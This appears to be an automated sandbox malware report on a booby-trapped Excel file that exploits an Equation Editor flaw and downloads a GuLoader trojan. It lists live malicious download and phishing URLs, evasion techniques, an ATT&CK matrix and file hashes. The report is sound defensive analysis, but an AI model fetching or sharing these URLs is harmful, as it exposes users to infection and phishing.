Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Stream path 'MBD0010AD4D/CONTENTS' entropy: 7.98358241179 (max. 8.0)
Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Stream path 'MBD0010AD4E/CONTENTS' entropy: 7.91892112048 (max. 8.0)
Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Stream path 'MBD0010AD50/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Stream path 'MBD0010AD54/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: 4B430000.0.dr	Stream path 'MBD0010AD4D/CONTENTS' entropy: 7.98358241179 (max. 8.0)
Source: 4B430000.0.dr	Stream path 'MBD0010AD4E/CONTENTS' entropy: 7.91892112048 (max. 8.0)
Source: 4B430000.0.dr	Stream path 'MBD0010AD50/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: 4B430000.0.dr	Stream path 'MBD0010AD54/CONTENTS' entropy: 7.94631733096 (max. 8.0)

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

RDTSC instruction interceptor: First address: 000000000894429E second address: 000000000894429E instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC3E1C2AE84h 0x00000008 inc ebp 0x00000009 cmp edx, ebx 0x0000000b inc ebx 0x0000000c test al, cl 0x0000000e rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2452	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2976	Thread sleep time: -360000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_004062DD FindFirstFileA,FindClose,	5_2_004062DD
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_004057A2
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_00402765 FindFirstFileA,	5_2_00402765

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2323
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2916
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2645
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2342
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	API call chain: ExitProcess graph end node	graph_5-4905
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	API call chain: ExitProcess graph end node	graph_5-4910
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_9-2702
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_9-2317
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_9-2616
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_9-2298

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_72BE1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_72BE1A98

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353048F mov edx, dword ptr fs:[00000030h]		2_2_0353048F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035F048F mov edx, dword ptr fs:[00000030h]		9_2_035F048F

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

5_2_00403235

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	2 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	21 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Scripting	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U4e5d#U6708#U58f0#U660e_40981677.xls	34%	ReversingLabs	Win32.Exploit.CVE-2018-0802
#U4e5d#U6708#U58f0#U660e_40981677.xls	48%	Virustotal		Browse
#U4e5d#U6708#U58f0#U660e_40981677.xls	100%	Avira	EXP/CVE-2018-0798.Gen

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\audiodgse.exe	100%	Avira	HEUR/AGEN.1331786
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	100%	Avira	HEUR/AGEN.1331786
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	32%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	32%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\audiodgse.exe	32%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\AppData\Roaming\audiodgse.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://103.72.68.128/S1510M/smss.exeeanO	0%	Avira URL Cloud	safe
http://103.72.68.128/S1510M/smss.exeiiC:	0%	Avira URL Cloud	safe
http://103.72.68.128/S1510M/smss.exej	100%	Avira URL Cloud	malware
http://103.72.68.128/S1510M/smss.exe	100%	Avira URL Cloud	malware
http://103.72.68.128/S1510M/smss.exej	11%	Virustotal		Browse
http://103.72.68.128/S1510M/smss.exe	11%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://103.72.68.128/S1510M/smss.exe	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://103.72.68.128/S1510M/smss.exeiiC:	EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	audiodgse.exe, audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	false		high
http://103.72.68.128/S1510M/smss.exeeanO	EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.72.68.128/S1510M/smss.exej	EQNEDT32.EXE, 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.72.68.128	unknown	India		45814	FARIYA-PKFariyaNetworksPvtLtdPK	true

Private

IP
192.168.2.22
192.168.2.255

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1326245
Start date and time:	2023-10-16 09:57:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	#U4e5d#U6708#U58f0#U660e_40981677.xls renamed because original name is a hash value
Original Sample Name:	_40981677.xls
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@22/46@0/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer Override analysis time to 56385.5349400749 for current running targets taking high CPU consumption Override analysis time to 112771.06988015 for current running targets taking high CPU consumption Override analysis time to 225542.1397603 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 209.197.3.8, 23.200.60.110, 23.72.90.6, 23.72.90.12
Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, acroipm2.adobe.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:58:21	API Interceptor	173x Sleep call for process: EQNEDT32.EXE modified
09:58:29	API Interceptor	233x Sleep call for process: AcroRd32.exe modified
09:58:40	API Interceptor	61x Sleep call for process: RdrCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.72.68.128	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.72.68.128/pcd/wAYOlXAIjrMljL79.bin
	Part_number_91875-11400_x_6.xls	Get hash	malicious	GuLoader	Browse	103.72.68.128/M0910T/smss.exe
	SOA_OCT.xls	Get hash	malicious	Unknown	Browse	103.72.68.128/S0810M/smss.exe
	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.72.68.128/pcd/ygcrnsVvq3.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FARIYA-PKFariyaNetworksPvtLtdPK	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.72.68.128
	Part_number_91875-11400_x_6.xls	Get hash	malicious	GuLoader	Browse	103.72.68.128
	SOA_OCT.xls	Get hash	malicious	Unknown	Browse	103.72.68.128
	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.72.68.128
	3zCwW2eF3f.elf	Get hash	malicious	Mirai	Browse	111.92.200.115
	noxdC49Cci.elf	Get hash	malicious	Unknown	Browse	103.74.23.209
	https://www.weichert.com/links.aspx?https://na2.eecsign.com/y45ar9vKusa8D1mChory45ana0Try45ha8Dnhsa8Duk	Get hash	malicious	HTMLPhisher	Browse	103.76.128.106
	NuQd72CIeK.elf	Get hash	malicious	Mirai	Browse	39.62.16.215
	Anfrage_INQ0981_xlsx.exe	Get hash	malicious	GuLoader	Browse	103.76.128.7
	pTkFzJdEvE.elf	Get hash	malicious	Unknown	Browse	39.62.200.128
	arctically_revyers.exe	Get hash	malicious	GuLoader	Browse	103.76.128.7
	wYGJSu5FPn.elf	Get hash	malicious	Mirai, Moobot	Browse	103.72.65.240
	z3hir.arm.elf	Get hash	malicious	Mirai	Browse	59.103.94.130
	https://eu45.web.app/sdy9s3Rhri2Psk17Fe5nsFe5nx0qhandFe5lsblak17k17grWO3updy9s3RWO3BM2	Get hash	malicious	Unknown	Browse	103.76.128.106
	https://dse.mihanair.com/?organisation=handelsblattgroup.com?&ref=cy5jaHJpc3RlbnNlbkBoYW5kZWxzYmxhdHRncm91cC5jb20=#/auth/authorize?client_id=0.30038618496637-0ff1-0.12773079105082&auth=10.28450389499054-0.68949893521587	Get hash	malicious	Unknown	Browse	103.76.128.106
	aXpsGG2XaP.elf	Get hash	malicious	Mirai	Browse	39.62.16.253
	U7LTMj2PAO.elf	Get hash	malicious	Mirai	Browse	111.92.200.196
	usjvpec40i.elf	Get hash	malicious	Mirai	Browse	39.62.211.164
	CT1zp877iP.elf	Get hash	malicious	Mirai	Browse	111.92.195.219
	7h922H0hee.elf	Get hash	malicious	Mirai	Browse	59.103.94.109

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse
	MaMsKRmgXZ.exe	Get hash	malicious	GuLoader	Browse
	Part_number_91875-11400_x_6.xls	Get hash	malicious	GuLoader	Browse
	3CoQ2gnbIu.exe	Get hash	malicious	GuLoader	Browse
	3CoQ2gnbIu.exe	Get hash	malicious	GuLoader	Browse
	Zc8N38ZHPi.exe	Get hash	malicious	GuLoader	Browse
	Zc8N38ZHPi.exe	Get hash	malicious	GuLoader	Browse
	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse
	SOA_OCT.exe	Get hash	malicious	GuLoader	Browse
	Cargo_manifest_&_BL_10784813.exe	Get hash	malicious	GuLoader	Browse
	Cargo_manifest_&_BL_10784813.exe	Get hash	malicious	GuLoader	Browse
	Payment_Advice-pdf.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Payment_Advice-pdf.exe	Get hash	malicious	GuLoader	Browse
	Civilizee.exe	Get hash	malicious	GuLoader	Browse
	Civilizee.exe	Get hash	malicious	GuLoader	Browse
	RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe	Get hash	malicious	GuLoader, Remcos	Browse
	RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe	Get hash	malicious	GuLoader	Browse
	RFQ____RM_quotation_JPEG_IMAGE.exe	Get hash	malicious	GuLoader, Remcos	Browse
	RFQ____RM_quotation_JPEG_IMAGE.exe	Get hash	malicious	GuLoader	Browse
	I-ID-4175285786-D07450364_20230803042004.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

(copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 16 08:58:53 2023, Security: 0
Category:	dropped
Size (bytes):	1424384
Entropy (8bit):	7.841255073938591
Encrypted:	false
SSDEEP:	24576:+WQmmav30x3Zyvw6Vr9bV1DWZylw6VK4bV1P9qfa4HBA8b7DJHj/xOroKK3t2fon:zQmmQ30jr6Vr9bVWh6VK4bVKRA8bXJLT
MD5:	5E6148DC18712F3B090652691D016616
SHA1:	D5488DED267AD18F555AA81F5745E4C708A66BB6
SHA-256:	9F490B1971564541CF4A4E0FEDAD05798BF719B5449B7CF2A59A97CF5F6CB343
SHA-512:	24BD24571A2F510E25475A848AE3D1438E71685A18B19E865C99F2A6AAA62B671EB28C1DF1E567C53D5CDF1AF5A312CF2BE4191122596A3892EA1CF75D6CA536
Malicious:	false
Reputation:	low
Preview:	......................>.......................................................0...1...H...I...?.......................$.......b.......d.......f.......h.......j.............................................................................................................................................................................................................................................................................................................................................................................../.......G................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........F...........3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018885380473555064
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zExlSvl:/M/xT02z5
MD5:	5166931C33EFA8F459A8E5CEDCBEA879
SHA1:	27D2834EEDD1D20004299C6721B996B696F35A9B
SHA-256:	DABDAE21A6389F5593EAB5F6538D772CA278166E0CB5C2AE46DBFDA4FC4C9B2B
SHA-512:	7A4158A770F81F4578022342F8856F396E8B50BBE2B7031C787CF5FBBF648EA2191A8328959CCACD74C978066049364D78B031A0557358D12B5325CB09260740
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.262185727083471
Encrypted:	false
SSDEEP:	6:ko8cq2PP2nKuAl9OmbnIFUtBsrZmwvshkwOP2nKuAl9OmbjLJ:ko8cvWHAahFUt6r/Uh57HAaSJ
MD5:	0E0C82F2B1EC65CF15E9D841918CF77E
SHA1:	954405231AFF31B5FC77DD38C5685A8BEBDF9DA0
SHA-256:	2A192E765FF1F216EEF91ADD40D0755BAFCBFDD917BBCCBE80CB786BC85B67A0
SHA-512:	02B8F14C1F6FFA3D573ACD824FC4009B97FB6345122EADDA88D04969D908181BD207F9BF703B217068C53F324310726F50F3E63395ED52BFD724A2ADA5617FEA
Malicious:	false
Reputation:	low
Preview:	2023/10/16-09:58:42.507 3824 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/10/16-09:58:42.509 3824 Recovering log #3.2023/10/16-09:58:42.509 3824 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.008898238653846898
Encrypted:	false
SSDEEP:	3:ImtVnM1xVlt/rt/l3Sxdlt4dV1gt/lop:IiV0xlzaxdX4m1lo
MD5:	3B8BF2F369CA7ABDF0636EE15DDEF161
SHA1:	4B82D483B79B555C62AA17F31F24F43C38F2C80F
SHA-256:	100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
SHA-512:	457D92EA15FA528E7BE3ED8136A267BD08A4D7866FDD7C353CFEB898F896983B40BB48156DC25D5E00EC118C6309337F3A9344226D1635F94D7F4A122D3DD87E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	3.576067987433191
Encrypted:	false
SSDEEP:	384:neh9dTh+tELJ8DAcLKuZsLRGlKhsvXh+vSc:DAeZsLQhUSc
MD5:	AE8579F67149D36E57EDC20F2DCA75B7
SHA1:	695F81379729CDB1152B7A900D5C3A8D9B1A2D67
SHA-256:	1B79715B51CD5CA5FA15B0227E372BCC09A1330B76C70E9F7E9B5CAF5C5D1DDB
SHA-512:	C7F27D921C34D71328DFC6E6A5D609B2EC49786C653928A77614C70C8C8A6584B600A283F33C0A3E546D114D9B9EFA4C6DF24069056006E24410F13A0B925642
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.3121723059304196
Encrypted:	false
SSDEEP:	48:7Mu2iomVmBsmom1CZqiomSfom1Nom1Aiom1RROiom1Com1pom1zXiomVPiomgOqn:7gCm6rUkhHCPOd49IVXEBodRBkN
MD5:	A7D1D323808F5F7EA0CFED1D2735FF67
SHA1:	6455B00C18FA0A4AB3C84B4EB77003CA87F94D3B
SHA-256:	F39543E5BC72F835F74B274F6C5C33D75EDD21459FFEDD6FA5736D817E86B820
SHA-512:	7EC826DAC1BA8AAE2221C1D5D5750DB1CEAB9931F7B00CAC52F758A4077324FC9CB292B138CFB6A38D42C59D3574F0AD467C976C710E287AE53A8595155FC9AD
Malicious:	false
Preview:	.... .c......].+..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

